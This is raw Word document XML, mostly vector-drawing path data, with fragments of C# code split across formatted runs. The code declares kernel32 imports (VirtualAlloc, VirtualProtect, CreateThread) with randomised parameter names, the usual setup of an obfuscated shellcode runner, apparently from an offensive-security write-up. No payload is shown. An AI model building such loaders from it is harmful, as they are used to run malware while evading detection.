14481,1510,14477,1510,14473,1510,14468,1510,14464,1510,14459,1510,14454,1510,14449,1510,14443,1510,14438,1510,14432,1510,14427,1510,14421,1510,14415,1510,14409,1510,14402,1510,14396,1510,14389,1510,14382,1510,14375,1510,14368,1510,14360,1510,14352,1510,14345,1510,14337,1510,14328,1510,14320,1510,14311,1510,14303,1510,14294,1510,14284,1510,14275,1510,14265,1510,14256,1510,14246,1510,14235,1510,14225,1510,14214,1510,14203,1510,14192,1510,14181,1510,14169,1510,14158,1510,14146,1510,14133,1510,14121,1510,14108,1510,14095,1510,14082,1510,14068,1510,14055,1510,14041,1510,14027,1510,14012,1510,13997,1510,13982,1510,13967,1510,13952,1510,13936e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:696.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13930" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:13930;width:30;height:630" coordorigin="1490,13930" coordsize="30,630" path="m1517,13936l1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13937,1517,13937,1517,13937,1517,13937,1517,13937,1517,13938,1517,13938,1517,13938,1517,13939,1517,13939,1517,13939,1517,13940,1517,13941,1517,13941,1517,13942,1517,13943,1517,13943,1517,13944,1517,13945,1517,13946,1517,13947,1517,13948,1517,13949,1517,13951,1517,13952,1517,13953,1517,13955,1517,13957,1517,13958,1517,13960,1517,13962,1517,13964,1517,13966,1517,13968,1517,13970,1517,13972,1517,13975,1517,13977,1517,13980,1517,13983,1517,13986,1517,13989,1517,13992,1517,13995,1517,13998,1517,14002,1517,14005,1517,14009,1517,14013,1517,14017,1517,14021,1517,14025,1517,14030,1517,14034,1517,14039,1517,14044,1517,14049,1517,14054,1517,14059,1517,14064,1517,14070,1517,14076,1517,14082,1517,14088,1517,14094,1517,14100,1517,14107,1517,14114,1517,14120,1517,14128,1517,14135,1517,14142,1517,14150,1517,14158,1517,14166,1517,14174,1517,14182,1517,14191,1517,14200,1517,14209,1517,14218,1517,14227,1517,14237,1517,14247,1517,14257,1517,14267,1517,14277,1517,14288,1517,14299,1517,14310,1517,14321,1517,14333,1517,14345,1517,14357,1517,14369,1517,14382,1517,14394,1517,14407,1517,14420,1517,14434,1517,14448,1517,14462,1517,14476,1517,14490,1517,14505,1517,14520,1517,14535,1517,14551,1517,14566e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:727.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14550" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:14550;width:8990;height:650" coordorigin="1490,14550" coordsize="8990,650" path="m1510,14566l1510,14566,1510,14566,1510,14566,1510,14566,1510,14566,1510,14566,1511,14566,1512,14566,1512,14566,1514,14566,1515,14566,1517,14566,1519,14566,1521,14566,1524,14566,1528,14566,1532,14566,1536,14566,1541,14566,1546,14566,1552,14566,1559,14566,1566,14566,1575,14566,1583,14566,1593,14566,1603,14566,1615,14566,1627,14566,1640,14566,1654,14566,1668,14566,1684,14566,1701,14566,1719,14566,1738,14566,1758,14566,1780,14566,1802,14566,1826,14566,1851,14566,1877,14566,1904,14566,1933,14566,1963,14566,1995,14566,2028,14566,2063,14566,2099,14566,2136,14566,2175,14566,2216,14566,2259,14566,2303,14566,2348,14566,2396,14566,2445,14566,2496,14566,2549,14566,2604,14566,2660,14566,2719,14566,2779,14566,2841,14566,2906,14566,2972,14566,3041,14566,3112,14566,3184,14566,3259,14566,3336,14566,3416,14566,3498,14566,3582,14566,3668,14566,3757,14566,3848,14566,3941,14566,4037,14566,4136,14566,4236,14566,4340,14566,4446,14566,4555,14566,4666,14566,4780,14566,4897,14566,5017,14566,5139,14566,5264,14566,5392,14566,5523,14566,5657,14566,5793,14566,5933,14566,6076,14566,6222,14566,6370,14566,6522,14566,6677,14566,6835,14566,6997,14566,7161,14566,7329,14566,7500,14566,7675,14566,7853,14566,8034,14566,8219,14566,8407,14566,8598,14566,8793,14566,8992,14566,9194,14566,9400,14566,9609,14566,9823,14566,10039,14566,10260,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14567,10484,14567,10484,14567,10484,14567,10484,14567,10484,14567,10484,14567,10484,14568,10484,14568,10484,14568,10484,14569,10484,14569,10484,14569,10484,14570,10484,14570,10484,14571,10484,14572,10484,14572,10484,14573,10484,14574,10484,14575,10484,14576,10484,14577,10484,14578,10484,14579,10484,14580,10484,14581,10484,14583,10484,14584,10484,14586,10484,14587,10484,14589,10484,14591,10484,14593,10484,14595,10484,14597,10484,14599,10484,14601,10484,14604,10484,14606,10484,14609,10484,14611,10484,14614,10484,14617,10484,14620,10484,14623,10484,14627,10484,14630,10484,14634,10484,14637,10484,14641,10484,14645,10484,14649,10484,14653,10484,14658,10484,14662,10484,14667,10484,14671,10484,14676,10484,14682,10484,14687,10484,14692,10484,14698,10484,14703,10484,14709,10484,14715,10484,14722,10484,14728,10484,14734,10484,14741,10484,14748,10484,14755,10484,14762,10484,14770,10484,14777,10484,14785,10484,14793,10484,14802,10484,14810,10484,14819,10484,14827,10484,14836,10484,14845,10484,14855,10484,14865,10484,14874,10484,14884,10484,14895,10484,14905,10484,14916,10484,14927,10484,14938,10484,14949,10484,14961,10484,14973,10484,14985,10484,14997,10484,15010,10484,15022,10484,15035,10484,15049,10484,15062,10484,15076,10484,15090,10484,15104,10484,15119,10484,15134,10484,15149,10484,15164,10484,15180,10484,15196,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10483,15212,10482,15212,10482,15212,10480,15212,10479,15212,10477,15212,10475,15212,10473,15212,10470,15212,10466,15212,10462,15212,10458,15212,10453,15212,10448,15212,10442,15212,10435,15212,10428,15212,10419,15212,10411,15212,10401,15212,10391,15212,10379,15212,10367,15212,10354,15212,10340,15212,10326,15212,10310,15212,10293,15212,10275,15212,10256,15212,10236,15212,10215,15212,10192,15212,10168,15212,10143,15212,10117,15212,10090,15212,10061,15212,10031,15212,9999,15212,9966,15212,9931,15212,9895,15212,9858,15212,9819,15212,9778,15212,9735,15212,9691,15212,9646,15212,9598,15212,9549,15212,9498,15212,9445,15212,9391,15212,9334,15212,9275,15212,9215,15212,9153,15212,9088,15212,9022,15212,8953,15212,8883,15212,8810,15212,8735,15212,8658,15212,8578,15212,8497,15212,8413,15212,8326,15212,8238,15212,8146,15212,8053,15212,7957,15212,7859,15212,7758,15212,7654,15212,7548,15212,7439,15212,7328,15212,7214,15212,7097,15212,6977,15212,6855,15212,6730,15212,6602,15212,6471,15212,6337,15212,6201,15212,6061,15212,5918,15212,5773,15212,5624,15212,5472,15212,5317,15212,5159,15212,4997,15212,4833,15212,4665,15212,4494,15212,4319,15212,4141,15212,3960,15212,3776,15212,3587,15212,3396,15212,3201,15212,3002,15212,2800,15212,2594,15212,2385,15212,2172,15212,1955,15212,1734,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15211,1510,15211,1510,15211,1510,15211,1510,15211,1510,15211,1510,15211,1510,15210,1510,15210,1510,15210,1510,15209,1510,15209,1510,15209,1510,15208,1510,15208,1510,15207,1510,15206,1510,15206,1510,15205,1510,15204,1510,15203,1510,15202,1510,15201,1510,15200,1510,15199,1510,15198,1510,15197,1510,15195,1510,15194,1510,15192,1510,15191,1510,15189,1510,15187,1510,15185,1510,15183,1510,15181,1510,15179,1510,15177,1510,15174,1510,15172,1510,15169,1510,15167,1510,15164,1510,15161,1510,15158,1510,15155,1510,15151,1510,15148,1510,15144,1510,15141,1510,15137,1510,15133,1510,15129,1510,15125,1510,15120,1510,15116,1510,15111,1510,15106,1510,15102,1510,15096,1510,15091,1510,15086,1510,15080,1510,15075,1510,15069,1510,15063,1510,15056,1510,15050,1510,15044,1510,15037,1510,15030,1510,15023,1510,15016,1510,15008,1510,15001,1510,14993,1510,14985,1510,14976,1510,14968,1510,14959,1510,14951,1510,14942,1510,14932,1510,14923,1510,14913,1510,14904,1510,14894,1510,14883,1510,14873,1510,14862,1510,14851,1510,14840,1510,14829,1510,14817,1510,14805,1510,14793,1510,14781,1510,14768,1510,14756,1510,14743,1510,14729,1510,14716,1510,14702,1510,14688,1510,14674,1510,14659,1510,14644,1510,14629,1510,14614,1510,14598,1510,14582,1510,14566e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:727.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14550" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:14550;width:30;height:650" coordorigin="1490,14550" coordsize="30,650" path="m1517,14566l1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14567,1517,14567,1517,14567,1517,14567,1517,14567,1517,14567,1517,14567,1517,14568,1517,14568,1517,14568,1517,14569,1517,14569,1517,14569,1517,14570,1517,14570,1517,14571,1517,14572,1517,14572,1517,14573,1517,14574,1517,14575,1517,14576,1517,14577,1517,14578,1517,14579,1517,14580,1517,14581,1517,14583,1517,14584,1517,14586,1517,14587,1517,14589,1517,14591,1517,14593,1517,14595,1517,14597,1517,14599,1517,14601,1517,14604,1517,14606,1517,14609,1517,14611,1517,14614,1517,14617,1517,14620,1517,14623,1517,14627,1517,14630,1517,14634,1517,14637,1517,14641,1517,14645,1517,14649,1517,14653,1517,14658,1517,14662,1517,14667,1517,14671,1517,14676,1517,14682,1517,14687,1517,14692,1517,14698,1517,14703,1517,14709,1517,14715,1517,14722,1517,14728,1517,14734,1517,14741,1517,14748,1517,14755,1517,14762,1517,14770,1517,14777,1517,14785,1517,14793,1517,14802,1517,14810,1517,14819,1517,14827,1517,14836,1517,14845,1517,14855,1517,14865,1517,14874,1517,14884,1517,14895,1517,14905,1517,14916,1517,14927,1517,14938,1517,14949,1517,14961,1517,14973,1517,14985,1517,14997,1517,15010,1517,15022,1517,15035,1517,15049,1517,15062,1517,15076,1517,15090,1517,15104,1517,15119,1517,15134,1517,15149,1517,15164,1517,15180,1517,15196,1517,15212e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:759.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15190" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:15190;width:8990;height:650" coordorigin="1490,15190" coordsize="8990,650" path="m1510,15212l1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1511,15212,1512,15212,1512,15212,1514,15212,1515,15212,1517,15212,1519,15212,1521,15212,1524,15212,1528,15212,1532,15212,1536,15212,1541,15212,1546,15212,1552,15212,1559,15212,1566,15212,1575,15212,1583,15212,1593,15212,1603,15212,1615,15212,1627,15212,1640,15212,1654,15212,1668,15212,1684,15212,1701,15212,1719,15212,1738,15212,1758,15212,1780,15212,1802,15212,1826,15212,1851,15212,1877,15212,1904,15212,1933,15212,1963,15212,1995,15212,2028,15212,2063,15212,2099,15212,2136,15212,2175,15212,2216,15212,2259,15212,2303,15212,2348,15212,2396,15212,2445,15212,2496,15212,2549,15212,2604,15212,2660,15212,2719,15212,2779,15212,2841,15212,2906,15212,2972,15212,3041,15212,3112,15212,3184,15212,3259,15212,3336,15212,3416,15212,3498,15212,3582,15212,3668,15212,3757,15212,3848,15212,3941,15212,4037,15212,4136,15212,4236,15212,4340,15212,4446,15212,4555,15212,4666,15212,4780,15212,4897,15212,5017,15212,5139,15212,5264,15212,5392,15212,5523,15212,5657,15212,5793,15212,5933,15212,6076,15212,6222,15212,6370,15212,6522,15212,6677,15212,6835,15212,6997,15212,7161,15212,7329,15212,7500,15212,7675,15212,7853,15212,8034,15212,8219,15212,8407,15212,8598,15212,8793,15212,8992,15212,9194,15212,9400,15212,9609,15212,9823,15212,10039,15212,10260,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15213,10484,15213,10484,15213,10484,15213,10484,15214,10484,15214,10484,15215,10484,15215,10484,15216,10484,15216,10484,15217,10484,15218,10484,15218,10484,15219,10484,15220,10484,15221,10484,15222,10484,15223,10484,15224,10484,15225,10484,15226,10484,15228,10484,15229,10484,15231,10484,15232,10484,15234,10484,15236,10484,15237,10484,15239,10484,15241,10484,15244,10484,15246,10484,15248,10484,15250,10484,15253,10484,15256,10484,15258,10484,15261,10484,15264,10484,15267,10484,15271,10484,15274,10484,15277,10484,15281,10484,15285,10484,15288,10484,15292,10484,15297,10484,15301,10484,15305,10484,15310,10484,15314,10484,15319,10484,15324,10484,15329,10484,15335,10484,15340,10484,15346,10484,15351,10484,15357,10484,15363,10484,15369,10484,15376,10484,15382,10484,15389,10484,15396,10484,15403,10484,15410,10484,15418,10484,15426,10484,15433,10484,15441,10484,15450,10484,15458,10484,15467,10484,15475,10484,15484,10484,15494,10484,15503,10484,15513,10484,15522,10484,15532,10484,15543,10484,15553,10484,15564,10484,15575,10484,15586,10484,15597,10484,15609,10484,15620,10484,15632,10484,15645,10484,15657,10484,15670,10484,15683,10484,15696,10484,15710,10484,15723,10484,15737,10484,15751,10484,15766,10484,15781,10484,15795,10484,15811,10484,15826,10484,15842,10484,15842,10484,15842,10484,15842,10484,15842,10484,15842,10484,15842,10483,15842,10482,15842,10482,15842,10480,15842,10479,15842,10477,15842,10475,15842,10473,15842,10470,15842,10466,15842,10462,15842,10458,15842,10453,15842,10448,15842,10442,15842,10435,15842,10428,15842,10419,15842,10411,15842,10401,15842,10391,15842,10379,15842,10367,15842,10354,15842,10340,15842,10326,15842,10310,15842,10293,15842,10275,15842,10256,15842,10236,15842,10215,15842,10192,15842,10168,15842,10143,15842,10117,15842,10090,15842,10061,15842,10031,15842,9999,15842,9966,15842,9931,15842,9895,15842,9858,15842,9819,15842,9778,15842,9735,15842,9691,15842,9646,15842,9598,15842,9549,15842,9498,15842,9445,15842,9391,15842,9334,15842,9275,15842,9215,15842,9153,15842,9088,15842,9022,15842,8953,15842,8883,15842,8810,15842,8735,15842,8658,15842,8578,15842,8497,15842,8413,15842,8326,15842,8238,15842,8146,15842,8053,15842,7957,15842,7859,15842,7758,15842,7654,15842,7548,15842,7439,15842,7328,15842,7214,15842,7097,15842,6977,15842,6855,15842,6730,15842,6602,15842,6471,15842,6337,15842,6201,15842,6061,15842,5918,15842,5773,15842,5624,15842,5472,15842,5317,15842,5159,15842,4997,15842,4833,15842,4665,15842,4494,15842,4319,15842,4141,15842,3960,15842,3776,15842,3587,15842,3396,15842,3201,15842,3002,15842,2800,15842,2594,15842,2385,15842,2172,15842,1955,15842,1734,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15841,1510,15841,1510,15841,1510,15841,1510,15841,1510,15840,1510,15840,1510,15840,1510,15839,1510,15839,1510,15839,1510,15838,1510,15837,1510,15837,1510,15836,1510,15835,1510,15835,1510,15834,1510,15833,1510,15832,1510,15831,1510,15830,1510,15829,1510,15827,1510,15826,1510,15825,1510,15823,1510,15821,1510,15820,1510,15818,1510,15816,1510,15814,1510,15812,1510,15810,1510,15808,1510,15806,1510,15803,1510,15801,1510,15798,1510,15795,1510,15792,1510,15789,1510,15786,1510,15783,1510,15780,1510,15776,1510,15773,1510,15769,1510,15765,1510,15761,1510,15757,1510,15753,1510,15748,1510,15744,1510,15739,1510,15734,1510,15729,1510,15724,1510,15719,1510,15714,1510,15708,1510,15702,1510,15696,1510,15690,1510,15684,1510,15678,1510,15671,1510,15664,1510,15658,1510,15650,1510,15643,1510,15636,1510,15628,1510,15620,1510,15612,1510,15604,1510,15596,1510,15587,1510,15578,1510,15569,1510,15560,1510,15551,1510,15541,1510,15531,1510,15521,1510,15511,1510,15501,1510,15490,1510,15479,1510,15468,1510,15457,1510,15445,1510,15433,1510,15421,1510,15409,1510,15396,1510,15384,1510,15371,1510,15358,1510,15344,1510,15330,1510,15316,1510,15302,1510,15288,1510,15273,1510,15258,1510,15243,1510,15227,1510,15212e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:759.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15190" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:15190;width:30;height:650" coordorigin="1490,15190" coordsize="30,650" path="m1517,15212l1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15213,1517,15213,1517,15213,1517,15213,1517,15214,1517,15214,1517,15215,1517,15215,1517,15216,1517,15216,1517,15217,1517,15218,1517,15218,1517,15219,1517,15220,1517,15221,1517,15222,1517,15223,1517,15224,1517,15225,1517,15226,1517,15228,1517,15229,1517,15231,1517,15232,1517,15234,1517,15236,1517,15237,1517,15239,1517,15241,1517,15244,1517,15246,1517,15248,1517,15250,1517,15253,1517,15256,1517,15258,1517,15261,1517,15264,1517,15267,1517,15271,1517,15274,1517,15277,1517,15281,1517,15285,1517,15288,1517,15292,1517,15297,1517,15301,1517,15305,1517,15310,1517,15314,1517,15319,1517,15324,1517,15329,1517,15335,1517,15340,1517,15346,1517,15351,1517,15357,1517,15363,1517,15369,1517,15376,1517,15382,1517,15389,1517,15396,1517,15403,1517,15410,1517,15418,1517,15426,1517,15433,1517,15441,1517,15450,1517,15458,1517,15467,1517,15475,1517,15484,1517,15494,1517,15503,1517,15513,1517,15522,1517,15532,1517,15543,1517,15553,1517,15564,1517,15575,1517,15586,1517,15597,1517,15609,1517,15620,1517,15632,1517,15645,1517,15657,1517,15670,1517,15683,1517,15696,1517,15710,1517,15723,1517,15737,1517,15751,1517,15766,1517,15781,1517,15795,1517,15811,1517,15826,1517,15842e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:210.500pt;margin-top:238.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4210,4770" coordsize="130,250">
        <v:shape style="position:absolute;left:4210;top:4770;width:130;height:250" coordorigin="4210,4770" coordsize="130,250" path="m4226,4781l4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4228,4781,4228,4781,4228,4781,4228,4781,4228,4781,4228,4781,4229,4781,4229,4781,4229,4781,4229,4781,4230,4781,4230,4781,4230,4781,4231,4781,4231,4781,4231,4781,4232,4781,4232,4781,4233,4781,4233,4781,4234,4781,4234,4781,4235,4781,4235,4781,4236,4781,4236,4781,4237,4781,4237,4781,4238,4781,4239,4781,4239,4781,4240,4781,4241,4781,4242,4781,4242,4781,4243,4781,4244,4781,4245,4781,4246,4781,4247,4781,4248,4781,4249,4781,4250,4781,4251,4781,4252,4781,4253,4781,4254,4781,4255,4781,4256,4781,4257,4781,4259,4781,4260,4781,4261,4781,4263,4781,4264,4781,4265,4781,4267,4781,4268,4781,4270,4781,4271,4781,4273,4781,4275,4781,4276,4781,4278,4781,4280,4781,4282,4781,4283,4781,4285,4781,4287,4781,4289,4781,4291,4781,4293,4781,4295,4781,4297,4781,4300,4781,4302,4781,4304,4781,4306,4781,4309,4781,4311,4781,4313,4781,4316,4781,4318,4781,4321,4781,4324,4781,4326,4781,4329,4781,4332,4781,4334,4781,4337,4781,4340,4781,4343,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4783,4346,4783,4346,4783,4346,4783,4346,4783,4346,4784,4346,4784,4346,4784,4346,4785,4346,4785,4346,4785,4346,4786,4346,4786,4346,4787,4346,4787,4346,4788,4346,4788,4346,4789,4346,4790,4346,4790,4346,4791,4346,4792,4346,4793,4346,4793,4346,4794,4346,4795,4346,4796,4346,4797,4346,4798,4346,4799,4346,4800,4346,4801,4346,4803,4346,4804,4346,4805,4346,4807,4346,4808,4346,4809,4346,4811,4346,4812,4346,4814,4346,4816,4346,4817,4346,4819,4346,4821,4346,4823,4346,4825,4346,4827,4346,4829,4346,4831,4346,4833,4346,4836,4346,4838,4346,4840,4346,4843,4346,4845,4346,4848,4346,4851,4346,4853,4346,4856,4346,4859,4346,4862,4346,4865,4346,4868,4346,4871,4346,4874,4346,4878,4346,4881,4346,4885,4346,4888,4346,4892,4346,4895,4346,4899,4346,4903,4346,4907,4346,4911,4346,4915,4346,4920,4346,4924,4346,4928,4346,4933,4346,4937,4346,4942,4346,4947,4346,4952,4346,4957,4346,4962,4346,4967,4346,4972,4346,4977,4346,4983,4346,4988,4346,4994,4346,5000,4346,5006,4346,5012,4346,5018,4346,5024,4346,5030,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4345,5037,4345,5037,4345,5037,4345,5037,4345,5037,4345,5037,4345,5037,4344,5037,4344,5037,4344,5037,4344,5037,4344,5037,4343,5037,4343,5037,4343,5037,4343,5037,4342,5037,4342,5037,4342,5037,4341,5037,4341,5037,4341,5037,4340,5037,4340,5037,4339,5037,4339,5037,4338,5037,4338,5037,4337,5037,4337,5037,4336,5037,4336,5037,4335,5037,4334,5037,4334,5037,4333,5037,4332,5037,4332,5037,4331,5037,4330,5037,4329,5037,4328,5037,4328,5037,4327,5037,4326,5037,4325,5037,4324,5037,4323,5037,4322,5037,4321,5037,4320,5037,4318,5037,4317,5037,4316,5037,4315,5037,4314,5037,4312,5037,4311,5037,4310,5037,4308,5037,4307,5037,4305,5037,4304,5037,4302,5037,4301,5037,4299,5037,4298,5037,4296,5037,4294,5037,4292,5037,4291,5037,4289,5037,4287,5037,4285,5037,4283,5037,4281,5037,4279,5037,4277,5037,4275,5037,4273,5037,4271,5037,4268,5037,4266,5037,4264,5037,4261,5037,4259,5037,4256,5037,4254,5037,4251,5037,4249,5037,4246,5037,4243,5037,4241,5037,4238,5037,4235,5037,4232,5037,4229,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5035,4226,5035,4226,5035,4226,5035,4226,5035,4226,5034,4226,5034,4226,5034,4226,5034,4226,5033,4226,5033,4226,5032,4226,5032,4226,5032,4226,5031,4226,5031,4226,5030,4226,5029,4226,5029,4226,5028,4226,5028,4226,5027,4226,5026,4226,5025,4226,5024,4226,5024,4226,5023,4226,5022,4226,5021,4226,5020,4226,5019,4226,5018,4226,5016,4226,5015,4226,5014,4226,5013,4226,5011,4226,5010,4226,5008,4226,5007,4226,5005,4226,5004,4226,5002,4226,5000,4226,4999,4226,4997,4226,4995,4226,4993,4226,4991,4226,4989,4226,4987,4226,4985,4226,4982,4226,4980,4226,4978,4226,4975,4226,4973,4226,4970,4226,4967,4226,4965,4226,4962,4226,4959,4226,4956,4226,4953,4226,4950,4226,4947,4226,4944,4226,4940,4226,4937,4226,4933,4226,4930,4226,4926,4226,4922,4226,4919,4226,4915,4226,4911,4226,4907,4226,4903,4226,4898,4226,4894,4226,4890,4226,4885,4226,4881,4226,4876,4226,4871,4226,4866,4226,4861,4226,4856,4226,4851,4226,4846,4226,4840,4226,4835,4226,4829,4226,4824,4226,4818,4226,4812,4226,4806,4226,4800,4226,4794,4226,4788,4226,4781e x" fillcolor="#fefefe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78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63" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1429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8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[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DllImport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(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"kernel32"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private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static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extern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IntPtr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VirtualAlloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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UIn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t32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rCfMkmxRSAakg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,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UInt32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qjRsrljIMB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UInt32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peXiTuE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UInt32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AkpADfOOAVBZ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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="107" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324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9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DllImport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"kernel32"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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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static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extern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bool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VirtualProtect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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IntPt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r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DStOGXQMMkP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uint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CzzIpcuQppQSTBJ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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uint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JCFImGhkRqtwANx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out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uint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exgVp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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sg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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92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10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DllImport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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"kernel32"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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]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private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static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extern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IntPtr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CreateThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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UInt3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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2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eisuQbXKYbAvA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UInt32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WQATOZaFz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IntPtr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AEGJQOn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,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IntPtr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SYcfyeeSgPl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UIn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t32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ZSheqBwKtDf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ref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UInt32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SZtdSB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;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11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DllImport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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
